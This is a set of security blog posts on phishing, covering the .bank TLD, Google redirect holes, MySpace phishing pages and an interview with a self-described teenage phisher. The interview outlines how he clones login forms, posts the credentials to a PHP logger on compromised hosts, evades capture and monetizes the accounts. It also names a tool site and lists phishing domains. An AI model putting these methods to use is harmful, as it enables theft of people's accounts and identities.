After reading a comment by David Ulevitch on a post by Dragos Lungu I was pretty interested in reading a new press release from OpenDNS on how they are “partnering” with the anti phishing work group (APWG). I actually laughed when I read it for a few reasons. Firstly, if you read Dave Jevans’ comment he says, “We are pleased to welcome PhishTank.com as a member of the APWG.” To me that seems less like a partner and more like a client. I couldn’t find any supporting words on APWG’s website at all to confirm a partnership in any capacity. To me it sounds like OpenDNS is simply going to consume data from APWG.

Secondly, this affirms what I was trying to get across in my comments on my post about the phishtank’s competitive nature with APWG. Although David Ulevitch never answered my questions posed to him in the comments, this pretty much sums up what I was saying. Unless these players start working together, they are only causing more churn in the industry as more companies have to deal with more anti-phishing aggregators. That in turn means that companies trying to protect themselves or their consumers have to build more APIs, sign more contracts or whatever, just to get the global knowledge of where phishing sites are. So, ultimately this sounds like a good thing, although I’m skeptical of how much a partnership this really is, given Dave Jevans’ comments. It sounds more like they are just a simple consumer/submitter, just like the other APWG members, but the press release may also just be poorly written.

I suppose I should probably weigh on on my feelings on the .bank TLD proposal. I kept my tongue hoping that someone would come out and explain what they thought it would solve, and I’m glad I did. Mikko from F-Secure finally published a writeup on why it should go through to ICANN. It was actually a pretty well thought out reply. I’m not going to summarize the post - go read it and come back, I’ll wait.

Now that you’ve read it, here are my thoughts. Yes, .bank will solve some heuristics problems. No, it won’t solve all of them. Banks hiring external marketing departments, regional divisions, loan offices, etc… etc… that all are owned by the parent will not be able to afford their own .bank TLD and will not be protected. Piggybacking off the parent URL is an equally bad idea for XSS phishing attacks. And if the banks allowed external organizations to piggyback how wold that solve your problem of extended validation of the site? Anyone have any guess as to how much money external marketing companies spend on server sercurity? Anyway, it does solve a few issues for heuristics, but it also creates a lot more. (Does this sound at all like why companies were told to buy EV certs? Has that worked for them? Why are we doing this twice?)

Banks have spent a lot of time and energy into making online presences. They can’t switch over to a new TLD on a dime. Sure, they will because they are told it’s the right thing to do, but it’s certainly not an overnight process. How much money are they going to spend buying the domains, re-tooling their websites, re-branding them and re-educating their own staff and their customers?

.bank does not apply to some of the most heavily phished sites out there, like Amazon, eBay, PayPal, AOL, MySpace and a host of credit unions. I see where they are going with this, but it’s a slippery slope. Just because you get phished a lot doesn’t earn you the right to have a .bank TLD (because that is the exclusive domain of banks, of course). While it may earn you a right to have a .dontphishme TLD every site on earth that does electronic transactions is going to want that.

Probably my biggest problem with this, is that these companies each spend a ton of money in education, and promoting their brand. For them to switch their TLD would work against all those dollars spent, and ultimately wouldn’t prevent blind redirects, XSS phishing, or just plain old URL obfuscation. Yes, it would make detection slightly easier, but by how much? An order of magnitude? I highly doubt it, and even if it did, is the problem not being able to detect the phishing sites well or is our problem not being able to take them down quickly enough? I think it’s the latter, and I don’t think a .bank TLD or any other derivative is going to solve that issue.

While I applaud the creativity, I really don’t think it does enough to warrant it going through. But I have no doubt where there’s a will there’s a way and it will go through despite my opinions. I know people mean well with these types of proposals, but I think there’s a lot more going on here than just detection. Yes, detection does need to be improved, but there’s tons of ways around detection and phishers have not had resort to that (minus a few experiments).

To me that means we are a long way from having to worry about the detection portion of the attack and if people want to put a dent in it they should instead focus on building better extradition treaties and tougher international cybercrime laws with all countries. Currently it can take days or weeks to get phishing sites taken down because there is no political pressure to do so in certain areas. I believe people would be much better suited in solving the take-down issue than creating a new .TLD that excludes more phished domains than it protects.

This isn’t new, but a few different people sent me a link to how Google is yet again being used for phishing. Don’t trust those Google links! I hate to say I told you so but when Google fixed that one single redirect hole and left the dozens of others in place I warned that this might happen.

When you leave one redirect hole in place it doesn’t matter that you closed another one. It’s a mild annoyance at best to a phisher. So this will continue to be a problem until they are all fixed. People will continue to click on those links and the anti-phishing software will continue to not be able to blacklist them because Google doesn’t like to be blacklisted. Google is plenty happy to warn people not to click on other sites that may contain malware, though (sense some hypocrisy there?).

I’m hoping their executive management wakes up and smells the coffee. It’s something I’ve been saying for over a year now, and we are no closer to having it solved. Worse yet, it’s screwing over the consumers!

Okay, I had a lot of fun with this post. No new news here, but I was able to talk to someone who was willing to sit down and write out some thoughts from a phisher’s perspective. The phisher goes by the name “lithium” and agreed to answer a number of questions that have been on my mind for a while now. Huge thanks to him, as I think a lot of this is valuable information to the community at large, These are his words - unmodified:

How would you describe yourself? Age? Did you go to school? Interests?

Determined is the best word to describe myself. I’m 18 years young. Yes, I went to school. I left after high school. My interests are mma (mixed martial arts); fitness and last but not least..The internet!

How did you get your start in phishing? How did you get interested in it?

The typical scam mail that my parents kept recieving in their inbox. They were very poorly done! Yet in general they worked. So, I knew automatically I could come up with more efficient methods and have a far greater outcome.

How long have you been phishing?

I’ve been pishing since I turned 14. So thats, Nearly 5 years.

Do you have any idea how many people’s identities you’ve stolen so far?

Way over 20 million. Social networking worms really hit it off for me! I have so many hundreds of thousands of accounts to many websites I haven’t even got a chance to look through.

Did you need to forge any particular relationships with other people/groups to get started?

No, When I started I went solo. Alot of groups came to me asking if I wanted in, I declined.

What types of sites make the best phishing sites?

Social networking sites, Any site that involves teenagers ranging from 14 years old upwards.

What are the steps you take to set up a phishing site?

I try find a domain name that would best suite the current target. Try find a few similarities which would make my site more realistic. Then, Register it! I then find a reliable anonymouse host. (Offshore are the most reliable) Although, I do tend to use compromised hosting accounts.

Secondly, I view the page source. Then I alter the source code to post the forms information to my pishing site.

Thirdly, I create a php file which will POST the current forms information to a text file on my server. I use the same php file with every site, Just minor alterations are needed since it’s mearly a few lines of php code.

How many people do you typically phish per site you post?

That all depends on the size of the website (the ammount of users) Usually, I pish 30k a day.

How do you monetize the identities and how much does that net you?

Social networking sites, Make me $500 to 1k through CPA deals. 5 times out of 10 the person uses the same password for their email account. Now depending what is inside their email inbox determines how much more profit I make. If an email account has one of the following paypal/egold/rapidshare/ebay accounts even the email account itself, I sell those to scammers. All in all, I make 3k to 4k a day. I only pish 3-4 days a week. Depends on how much time I invest, The more time I invest the greater the outcome.

Are there any costs associated with phishing?

Yes there are costs. A dedicated server, VPN, Network encryption software and time.

What sort of hardware/software do you need to do this? Anything special (phishing kits, etc…)? What kind of internet connection do you use?

For MOST social networking sites, I use a program called MyChanger. You can find it on this website - www.myownchanger.com - This makes pishing so much faster on social networking sites. Everything is automated! messaging/bulletins/comments/profile modifications it’s great. Other than that, I get ALOT of custom programs built to suite my needs from freelance developers. My internet connection isn’t anything fancy, A stanard 1mb adsl line.

How do you keep yourself safe from being caught?

I use VPN’s, Dedicated servers, Proxies and my network traffic is
encrypted. All payments are made through egold.

Are there any anti-phishing deterrents (tools or technology) that make life as a phisher harder?

Oh sure, There are many things that make pishing harder. But since Internet Explorer 7 and firefox 2 have implemented an antiphishing protection, Those two cause the most irritation.

Do you forsee any changes to the phishing industry that are worthy of note?

No.

Anything else you’d like to share/last words?

Lazy web developers are the reason I’m still around pishing.

Pretty telling on the current state of affairs, I’d say. The first interesting point I took from this were that IE7 and FF2 were actually a somewhat okay deterrent. From the looks of it, it hasn’t made much of a dent - only changed the tactics that phishers use. I suppose we could have guessed that since there is no lack of phishing emails in our inboxes, still I found it somewhat surprising that it was making a dent. I actually predicted that it would before IE7.0 launched, but I lost a bit of hope afterwards. Interesting nonetheless.

The second is that the password is used in more than one place 50% of the time - we already knew that but it’s interesting to hear it from a phisher’s perspective on how that’s actually useful to help monetize the attack. A huge thanks to lithium who allowed me to post all of his words. Does it make you re-think that MySpace profile you set up?

This is certainly not new, but I happened across an interesting link to a bunch of phishing sites built into MySpace. Instead of being a normal phishing site that rely on JavaScript injection or email, the MySpace phishing sites rely only on injecting a form that overlays over the page itself. The URL to find these is a simple Google dork.

At the time of writing there were 56 phishing sites on MySpace. Obviously not huge as a percentage, but it’s scary that there are any at all. It’s unclear what they want to do with these urls, however, I spent a few minutes mapping out the URLs used by the phishers:

• 5 x hur.be
• 4 x willgle.com
• 2 x r3voluti0n.com
• 1 x m3rm.org
• 1 x spaceadder.info
• 1 x coolton.dajoob.com
• 1 x www.profilespider.com
• 1 x www.itfailz.net
• 1 x artexstudios.com
• 1 x members.lycos.co.uk
• 1 x login-myspace.logindotspace.com
• 1 x www.googleidols.com

So only 20 were working/alive as I checked. I was able to find one example of the PHP script used (almost all of them were written in PHP). This one was simply wildly mis-configured. A number of them appeared to be old and were hobbled by MySpace who changed the URL to a “..” which had the effect of breaking the script, but the pages were still messed up (as if MySpace pages aren’t already messed up enough to begin with). Pretty ugly.

In an interesting email that was sent to me I was asked to take a peek at a new software tool, not yet released to the public called Vidoop (there is an interesting article on it here). While I was unable to actually take a look at the software, I’ve got a pretty good idea of how it works from the Wired article. After downloading a software certificate that allows you to use their software basically you say, “I like animals” and it shows you pictures of horses and cats and dogs all mixed in with a bunch of non-animal photos. You choose the the correct photos (a la kittenauth CAPTCHA) and you are granted access.

So here are the major problems with this that I see. Firstly, it’s probably not accessible (meaning there aren’t alt tags on the images) because if there were it would take only a few guesses to get in since the computer could build databases of “like” things. So basically, like in kittenauth, the blind are screwed (which we have talked about a dozen times and I really don’t want to start another conversation on it, I’m just sayin’). Secondly, it’s non-portable because you have to have the software installed on the computer you want to use. That means you can only use it from one computer (forget going over to a friend’s house and logging in) and if that one computer gets hosed you need to find an alternate path for getting the software installed (which is often the least secure part of these systems). This type of design is a lot less portable than tokens and for a consumer tokens are nearly unusable too.

Also something that makes me uncomfortable from a security perspective is the concept of single sign-in. I’ve always thought single sign-on was a great usability improvement but often terrible from a security perspective. Like the old motivational adage - you’re only as strong as your weakest link - the same is often true with single sign-on. You are often at the mercy of the weakest security model. If any one site is insecure you can (in many of the cases of single sign-on that I have seen) end up compromising all the other trusted sites. Perhaps Vidoop has a great way to solve that issue that revolutionizes the way authentication works and never opens itself up for attack under any scenario. Without looking at it, there’s no way for me to know.

Lastly, because Vidoop uses a relatively small set of photos to choose from, there are only a few general choices from which to brute force (otherwise you’d run into overlap and false positives). If I know the target is a male, chances are they aren’t going to pick the fuzzy animals. If I know the target is a 13 year old girl, chances are they aren’t going to pick photos of computers or sports cars and so on. Anyway, you see the problems with this, Unlike passwords, which are user specific (and still guessable), this is highly un-arbitrary. Does it stop phishing, keystroke logging, cure cancer or any other magical things? I can’t say without looking at it. Will I be using it for large scale mission critical secure production installs? Doubtful.

I guess this has been around for a while, but I just recently started seeing it on TV, but the McGruff the Crime Dog campaign is now targeting identity theft. This probably wouldn’t be a big deal except for the way the commercial is worded it sounds like what they are showing is how identity theft works. What they show in the commercial is someone taking a camera phone picture of a credit card. Sure, that would disclose the credit card number and the name and the expiration date, but not a lot more.

Firstly, the amount of crime that camera phone skimming makes up, is got to be fractions of a percent over people swiping numbers out of trash cans at gas stations and restaurants and online identity theft. Secondly, the information you get by only looking at the front of the card is only enough to do certain types of credit card transactions - especially because it’s missing the CVV2 number. Lastly, explaining identity theft in this way is missing a rather huge issue, which is phishing and hacking databases.

While I think it’s interesting to market to kids on ways to spot one form of identity theft that there is no chance of them being able to stop, it’s unfortunate that there are no commercials targeting them on ways to protect their identity online. COPPA laws are interesting but they only apply if you are a scrupulous company. Unfortunately phishers and hackers don’t particularly care about people’s age. I dunno, it seemed like it may be doing more harm than good in explaining identity theft in this way, and misguiding people’s understanding of the real issues.

I laughed when I saw a recent phishing email. Not so much because it was a new technique - it wasn’t. It was your old generic phishing scheme with SSL put in the middle of it: leo.ne.jp/ssl/onlinebanking.capitalone.com but it suddenly occurred to me. One thing I have heard many security people say when they are trying to explain best practices in web surfing to newbies is “look for SSL”. The term SSL means absolutely nothing to most people outside of the internet technology/security space. They may understand that “https” means it’s secure or that that “little lock thingy” in the corner makes them safe, but they don’t know why, and they probably have no clue that it’s SSL in the back end. So why do we tell them to look for it?

This all goes back to my distaste for consumer education. In this case our education is working wonderfully. The consumers are looking at that nice little “ssl” word and poof, they must be secure! They’ve never seen it before and they have no idea what it means, but they know that they’re secure now. I think it would behoove the security industry to stop chastizing people for being stupid when we are the ones who are misleading or miscommunicating to them in the first place. Besides, we need to come up with something more secure than SSL anyway.

Okay, new proposal time. Instead of inventing a new Internet (internet-s) with all it’s flaws, having to invent TCP and all the other madness all over again, what if we invent a new protocol that was still available to browsers, but lived in a far more restrictive sandbox? Why not make a new protocol that does what SSL was originally intended to do - secure people. No cross domain linking, no session riding, no anti-DNS pinning issues, no communication with browser shims or handlers, no XSS or JavaScript for that matter. Just a clean, well organized and most importantly a secured syntax that we can use for secure communication with servers. Why not? What we have now clearly isn’t working. I’m open to suggestions.

It’s true, because Firefox tells me so! I didn’t even realize it myself until my browser so nicely informed me that my post about extortion was potentially phishing for my password. And here I thought my site was working for me. All this time it was trying to steal my password! Thank god my browser is there to help me, cuz otherwise I would have… uhm… put my password in… somewhere… no, wait… maybe… uhm… on the page… uhm… I guess… hmmm… nothing here says password anywhere… maybe in that box that says comments… cuz that looks like it could steal stuff from me. I suppose you can sense my sarcasm, but really, come on. How is ha.ckers.org possibly anything like a phishing site? Click here to see what I saw this morning. As of the time of this blog post it’s still not fixed.

If there is anyone on earth who should be whitelisted, it’s this site, given the fact that there is zero chance I’d ever put a phishing site up on this website (if I wanted to be a bad guy, I sure as hell wouldn’t do it on my own site). Hell, I used to work on anti-phishing software. But this strikes me as strange. What is the vetting process involved in putting something on a suspected bad site anyway (clearly it’s not working)? From what I can tell there’s not much going on under the hood because there’s not a single thing on that page that looks anything like a phishing site.

If I had been running a big commercial site, this could have had severe impact on my ability to do business, and my reputation with my consumers. I don’t think most people realize how bad this kind of thing is. Ha.ckers.org is one of the few sites that really is not impacted at all by this sort of thing, but I know I’d feel differently if I were running an e-commerce site. Time to re-vamp the heuristics and the process boys. Color this security guy unimpressed.

Update: Apparently I am also put on the MSFT anti-phishing list as well Click here for a photo of that as well. So it looks like this isn’t heuristics based after all. Someone actually manually added me to the phishing list. Because that extortion post really looks scary. Nicely done guys.

Matt Cutts (the search engine guru at Google) just posted a few comments on this site and others that picked up the story that the redirection hole being used by phishers is now closed by adding a dialog warning you that you are being redirected (Click here for an example). That is good news because 1) clearly Google now can no longer deny it’s a hole - they themselves fixed it 2) some consumers may now be slightly safer, kinda. But as he himself said, this really isn’t a complete fix as this is only one of many known redirects in Google that have the potential of aiding phishing attacks.

There are 10 more redirects in Google that are still functional on this one URL alone. Google is riddled with these holes and they are incredibly easy to find. So while I applaud the fix, I am hardly impressed. It took over a year for this hole to get closed since I first announced it (you’ll notice the other three I mentioned in that post a year ago are still unfixed). There are at least 4 or 5 more that I’ve run across beyond that as well. It’s not even worth cataloging them at this point because there are so many left to fix.

So good job on fixing a small percent of the problem, but Google has got a very long road ahead of them before I’d trust clicking on any unscrutinized Google link I found on the web.